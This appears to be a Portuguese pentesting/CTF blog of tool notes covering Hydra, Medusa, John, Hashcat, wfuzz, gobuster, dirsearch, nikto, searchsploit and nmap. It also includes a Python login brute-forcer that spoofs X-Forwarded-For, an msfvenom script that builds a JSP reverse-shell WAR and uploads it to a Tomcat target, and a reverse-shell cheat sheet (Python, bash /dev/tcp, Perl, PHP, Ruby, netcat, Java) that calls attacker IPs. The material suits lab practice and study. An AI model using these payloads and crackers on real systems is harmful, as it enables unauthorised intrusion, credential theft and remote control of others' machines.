Ctf on FXShell - DevOps & Sec

Ferramentas De Quebra De Senhas

Felipe da Matta — Wed, 30 Sep 2020 23:58:15 UT

Hydra O Hydra é uma ferramenta famosa que realiza ataque de dicionário a serviços. Seu uso é, basicamente, assim: hydra -l -p -t Abaixo, um exemplo de uma tentativa única (-t 1) com o usuário root (-l root) e a senha 12345 (-p 12345) no endereço 10.0.2.2 no serviço ssh: hydra -l root -p 12345 10.0.2.2 ssh -t 1 Podemos passar um dicionário de logins e senhas com o parâmetro -L e -P: hydra -L -P hydra -L login.txt -P senha.txt 10.0.2.2 ssh -t 4 O Hydra também possui uma interface gráfica que pode ser chamada com o comando: xhydra Medusa Assim como o Hydra, o Medusa realiza ataque de dicionário a serviços. Seu uso é basicamente: Para listar os módulos: medusa -q | more Comando: medusa -h -u -p -M medusa -h 10.10.100.25 -u admin -p 1234 -M ftp Lista de IPs, usuários e senhas: medusa -H -U -P -M medusa -H hosts.txt -U users.txt -P pass.txt -M smbnt John the Ripper O John the Ripper (o nome da ferramenta faz alusão a um famoso psicopata do século 19, Jack, o Estripador) é uma das ferramentas mais usadas em pentest, sendo ele um utilitário que faz quebra de senhas de três modos: WordList → Tenta quebrar a senha usando uma wordlist com combinações de senha/usuário. Single Crack → Tenta quebrar a senha usando as informações de login. Incremental → O modo mais robusto: tenta cada caractere possível até achar a senha correta. Por esse motivo, é indicado o uso de parâmetros para reduzir o tempo de quebra. No caso do modo incremental, é necessário ter o arquivo contendo o hash da senha do usuário (SAM no Windows ou /etc/shadow no Linux). Seu uso é basicamente: john --wordlist=dicionario.txt john --single john --incremental john --wordlist=dicionario.txt --format=NT As senhas quebradas são armazenadas no arquivo: ~/.john/john.pot E assim como o Hydra, o JtR também tem uma interface gráfica, que pode ser chamada pelo comando: johnny OphCrack O OphCrack é uma ferramenta nativa do Kali Linux e específica para uso com Rainbow Tables. Com uma interface gráfica bem intuitiva, o OphCrack é ideal para realizar ataques de Brute Force em sistemas Windows. Hashcat Também nativo do Kali, o Hashcat é uma ferramenta específica para realizar ataques do tipo Password Cracking. Uma das features mais interessantes dela é a possibilidade de se utilizar o processador da placa de vídeo para dar mais performance ao ataque. Seu uso é basicamente: hashcat -m -a -o Exemplo: hashcat -m 1800 -a 0 -o cracked.txt /etc/shadow /usr/share/wordlists/rockyou.txt Caso os drivers da placa de vídeo não estejam instalados, é necessário utilizar a opção --force: hashcat -m 1800 -a 0 -o cracked.txt /etc/shadow /usr/share/wordlists/rockyou.txt --force Metasploit Framework O Metasploit (MSF) é um framework criado por H.D. Moore que serve para elaboração e execução de exploits. Apesar de não ser esse o objetivo principal da ferramenta, o MSF possui módulos de ataque de força bruta para diversas aplicações, como o SSH. Pode ser executado pela sequência de comandos abaixo: service postgresql start msfconsole use auxiliary/scanner/ssh/ssh_login # outros módulos disponíveis: # use auxiliary/scanner/ftp/ftp_login # use auxiliary/scanner/smb/smb_login # use auxiliary/scanner/telnet/telnet_login show options set run

Steghide

Felipe da Matta — Thu, 20 Aug 2020 02:23:34 UT

$ sudo apt-get install steghide # Para embutir um arquivo de texto dentro de uma imagem steghide embed -cf picture.jpg -ef secret.txt # Para extrair o arquivo de dentro da imagem steghide extract -sf picture.jpg # Para exibir informações sobre o arquivo de imagem com o embed steghide info picture.jpg

Wfuzz

Felipe da Matta — Fri, 31 Jul 2020 04:13:20 UT

É uma ferramenta de fuzzing criada para facilitar a avaliação de aplicações web. Baseia-se num conceito simples: substitui qualquer referência à palavra-chave FUZZ pelo valor de um determinado payload. Um payload no Wfuzz é uma fonte de dados. wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --hc 404 http://10.15.0.1/FUZZ -c colorir saída -w caminho da wordlist --hc ignorar códigos de resposta (ex: 404)

GoBuster

Felipe da Matta — Tue, 28 Jul 2020 02:44:29 UT

GoBuster — primo do DIRB O GoBuster é uma ótima ferramenta utilizada para força bruta em URIs (diretórios e arquivos). -fw – força o processamento de um domínio com resultados curinga. -np – oculta a saída do progresso. -m – qual modo usar: dir ou dns (padrão: dir). -q – desativa a saída de banner/sublinhado. -t – número de threads a serem executadas (padrão: 10). -u – URL completo (incluindo esquema) ou nome de domínio base. -v – saída detalhada (mostra todos os resultados). -w – caminho para a wordlist usada na força bruta (use - para stdin). Eu poderia usar o DIRB? Sim, pois ele também faz o scanning de páginas. Ficaria assim: $ dirb http://192.168.219.128:65535 /usr/share/dirb/wordlists/big.txt Com o GoBuster, faço o brute force + scanning de diretórios, usando a mesma wordlist do DIRB. $ gobuster dir -u http://192.168.219.128:65535 -w /usr/share/dirb/wordlists/big.txt Flags mais usadas: -w -u

Wordlist com Palavras do Site

Felipe da Matta — Thu, 23 Jul 2020 02:58:13 UT

Gerando wordlist com palavras do site cewl -w wordlists.txt -d 10 -m 1 http://seualvo.com/ Crie o arquivo brute.py Para executá-lo basta rodar o comando: $ python3 brute.py import re import requests def open_ressources(file_path): return [item.replace("\n", "") for item in open(file_path).readlines()] #alvo host = 'http://seualvo.com' #url do login login_url = host + '/admin/login' #user username = 'admin' #caminho da wordlist wordlist = open_ressources('/root/wordlists.txt') for password in wordlist: session = requests.Session() login_page = session.get(login_url) csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break

Dirsearch

Felipe da Matta — Thu, 23 Jul 2020 02:37:57 UT

DIRSEARCH https://github.com/maurosoria/dirsearch O dirsearch é uma ferramenta simples de linha de comando projetada para força bruta em diretórios e arquivos de sites. Particularmente prefiro ele ao DIRB ou GoBuster — já obtive mais resultados com ele. Vou escrever sobre essas outras ferramentas também. Uso git clone https://github.com/maurosoria/dirsearch.git cd dirsearch python3 dirsearch.py -u -e Exemplo $ python3 dirsearch.py -u http://sitedoalvo.com.br(ou IP) -e * _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: | HTTP method: getSuffixes: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6552 | Request count: 6552 Error Log: /root/dirsearch/logs/errors-20-06-29_23-59-23.log Target: http://10.10.10.185 Output File: /root/dirsearch/reports/10.10.10.185/20-06-29_23-59-24 [23:59:24] Starting: [00:00:12] 301 - 313B - /images -> http://10.10.10.185/images/ [00:00:14] 403 - 277B - /index.shtml [00:00:14] 200 - 67KB - /index.php [00:00:14] 200 - 67KB - /index.php/login/ [00:00:14] 403 - 277B - /install.sql [00:00:17] 403 - 277B - /localhost.sql [00:00:17] 403 - 277B - /log.sqlite [00:00:18] 200 - 4KB - /login.php [00:00:18] 403 - 277B - /login.shtml [00:00:19] 403 - 277B - /logs.sqlite O dirsearch vai encontrar pastas e urls uteis para a exploração de vulnerabilidades.

sh_MSFvenom

Felipe da Matta — Thu, 23 Jul 2020 02:25:57 UT

echo "-------------------------------------CRIANDO UM EXPLOID COM MSFVENOM----------------------------------------------------" msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f war > exploit.war #IP do seu local host + porta #Criação do arquivo .WAR echo "-------------------------------------UPLOAD DO EXPLOIT NO ALVO---------------------------------------------------------" curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://10.10.10.194:8080/manager/text/deploy?path=/exploit.war" #O ataque foi em um alvo cujo tomcat9 estava vulneravel #IP do RHOST(alvo) + porta da aplicação #upload do arquivo .war echo "------------------------------------sucesso no upload -----------------------------------------------------" echo "-----------------------------------Se conectando ao netcat---------------------------------------------------------" echo "----------------------------------- http://10.10.10.194:8080/exploit.war ---------------------------------------------" nc -nvlp 4444 #em outra aba do terminal, deixe escutando na porta que desejar # nc -nvlp 4444 Quando estiver ouvindo a porta, vá no navegador e acesse o arquivo que você acabou de fazer o upload: http://10.10.10.194:8080/exploit.war/ Volte ao terminal — ele terá conectado via shell. Agora execute o shell reverso em Python para obter um terminal interativo: listening on [any] 4444 ... connect to [10.10.14.29] from (UNKNOWN) [10.10.10.194] 50476 python3 -c "import pty;pty.spawn('/bin/bash')"

Reverse Shell

Felipe da Matta — Thu, 23 Jul 2020 01:51:31 UT

Python python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Bash bash -i >& /dev/tcp/192.168.19.68/4455 0>&1 Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat nc -e /bin/sh 10.0.0.1 1234 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm xterm -display 10.0.0.1:1 Xnest :1 xhost +targetip

Nikto

Felipe da Matta — Thu, 23 Jul 2020 01:47:23 UT

NIKTO ================ Examine o servidor da Web em busca de vulnerabilidades conhecidas, incluindo: Configurações incorretas de servidor e software Arquivos e programas padrão Arquivos e programas inseguros Servidores e programas desatualizados Não é necessário fazer a instalação do mesmo pois ele é um script perl. Ele vem nativo no kali, para atualizar recomendo baixar direto do git deles. https://github.com/sullo/nikto git clone https://github.com/sullo/nikto # Main script is in program/ cd nikto/program # Run using the shebang interpreter ./nikto.pl -h http://www.example.com # Run using perl (if you forget to chmod) perl nikto.pl -h http://www.example.com -h + alvo (por padrão setada porta 80) -o posso gerar relatório em html ou txt, csv. -p posso setar as portas que quero separados por virgula. Exemplo: nikto -h 192.168.0.126 -p 8081,443 -o scan.html Toda vez que precisar rodar o nikto em diferentes diretórios do alvo, é necessário colocar o http na frente: nikto -h http://192.168.0.126/files -p 8081,443 -o scan.html

Searchexploit

Felipe da Matta — Thu, 23 Jul 2020 01:46:40 UT

SEARCHSPLOIT Searchsploit, é uma ferramenta de pesquisa de linha de comando do Exploit-DB que também permite que você leve uma cópia do Exploit Database com você, aonde quer que você vá. O SearchSploit oferece a capacidade de realizar pesquisas off-line detalhadas por meio de sua cópia do repositório com check-out local. Esse recurso é particularmente útil para avaliações de segurança em redes segregadas ou com falta de ar sem acesso à Internet. Com as informações dos serviços coletados pelo NMAP, seria maneiro procurar no searchsploit se este serviço contém alguma vulnerabilidade, procurando um exploit para ele. Neste caso podemos usar o searchsploit da seguinte maneira: fpmatta@T-REX ~> searchsploit vsftpd ------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------- --------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remot | linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb ------------------------------------------- --------------------------------- Para atualizar a base do searchsploit faça: $ searchsploit -u Se não tiver ele instalado no seu S.O (caso não esteja utilizando o Kali linux): Clone o repositório, adicione o binário ao seu $PATH e edite o arquivo de configuração para refletir o caminho do git: $ sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb $ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit

NMAP

Felipe da Matta — Wed, 15 Jul 2020 18:02:31 UT

NMAP ================ O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Foi desenhada para escanear rapidamente redes amplas, embora funcione igualmente bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de forma inovadora para determinar quais hosts estão disponíveis na rede, quais serviços estão em execução, sistemas operacionais e versões, tipos de filtros de firewall e outras características. É amplamente utilizado por administradores de segurança para inventário de sistemas, gerenciamento de serviços e monitoramento de disponibilidade. Para cada caso de enumeração e circunstâncias, existe flags especificas para cada tipo de alvo, geralmente dou um scan superficial no inicio, e depois utilizo algo mais profundo. As flags que mais utilizo são as seguintes: nmap -sV -sC -Pn -T4 -v -p- --min-rate=10000 Identifica hosts ativos com a porta 445 aberta: nmap --open -v -sS -p 445 -Pn 192.168.20.0/24 -oG smb.txt Cria arquivo com saída mais limpa, somente IPs: cat smb.txt | grep "Up" | cut -d " " -f2 > targets Canivete-suíço para enumerar os hosts (nome, domínio…): crackmapexec smb targets Capturar hashes NBT-NS / LLMNR — alterar o arquivo /etc/responder/Responder.conf: ; Specific IP Addresses to respond to (default = All) ; Example: RespondTo = 10.20.1.100-150, 10.20.3.10 RespondTo = ... responder -I -Prv Também são muito utilizadas as flags abaixo, do scan mais simples ao mais completo: Varredura de porta TCP SYN (padrão) nmap -sS 192.168.1.1 Tentativas para determinar a versão do serviço em execução na porta nmap -sV 192.168.1.1 Scan com scripts NSE padrão. Considerado útil para descoberta e segurança nmap -sC 192.168.1.1 Desative a descoberta de host. Somente varredura de porta. nmap -Pn 192.168.1.1-5 Scan agressivo (4) mais acelerado, utilizar somente quando você estiver em uma rede razoavelmente rápida e confiável. nmap -T4 192.168.1.1 Aumenta o nível de verbosidade (-v ou -vv para ainda mais detalhes) nmap -v 192.168.1.1 Envie pacotes não mais lentos que por segundo. (–min-rate) nmap --min-rate=1000 192.168.1.1 Envie pacotes não mais rapidos que por segundo. (–max-rate) nmap --max-rate=1000 192.168.1.1 Efetua o handshake triplo do TCP. O Nmap solicita ao sistema operacional que estabeleça uma conexão com o destino na porta especificada. nmap -sT 192.168.1.1 Envia um SYN TCP para ver se a porta responde com SYN ACK (aberta) ou RST (fechada). Também conhecida como varredura semi-aberta, pois não conclui o handshake TCP. É o padrão para usuários root. nmap -sS 192.168.1.1 Realiza uma varredura UDP. Como o UDP não usa um handshake, um serviço escutando uma porta UDP pode não enviar nenhuma resposta. As portas que enviam uma resposta são exibidas como abertas. -sU (varredura UDP). nmap -sU 192.168.1.50 Ativa a detecção do SO. nmap -O 192.168.1.50 Quantos hosts ativos. nmap -sP 192.168.1.0/24 Script para automatizar o processo de Scan em hosts ativos, pode personalizar com suas flags favoritas. # nano maroto_scan.sh #!/bin/bash echo "Insira o Range:" read RANGE nmap -sP $RANGE | grep for | cut -d " " -f5 echo "Isso aê" Para tornar o script executável: chmod +x maroto_scan.sh # Resumo: # Porta aberta = SYN + ACK # Porta Fechada = RST # hping3 --syn -c 1 -p 80 sitedeteste.com # SYN ACK = Flag:SA # hping3 --syn -c 1 -p 8000 192.168.0.11 # RST = Flag:RA (reset ack) # nmap -sS -p 80 192.168.0.113 (sem ruído) # nmap -sV -p 80 192.168.0.113 (versões dos serviços, porém bem barulhento) # nmap -A 192.168.0.113 (full scan, usa todos os recursos do NMAP para filtrar o máximo)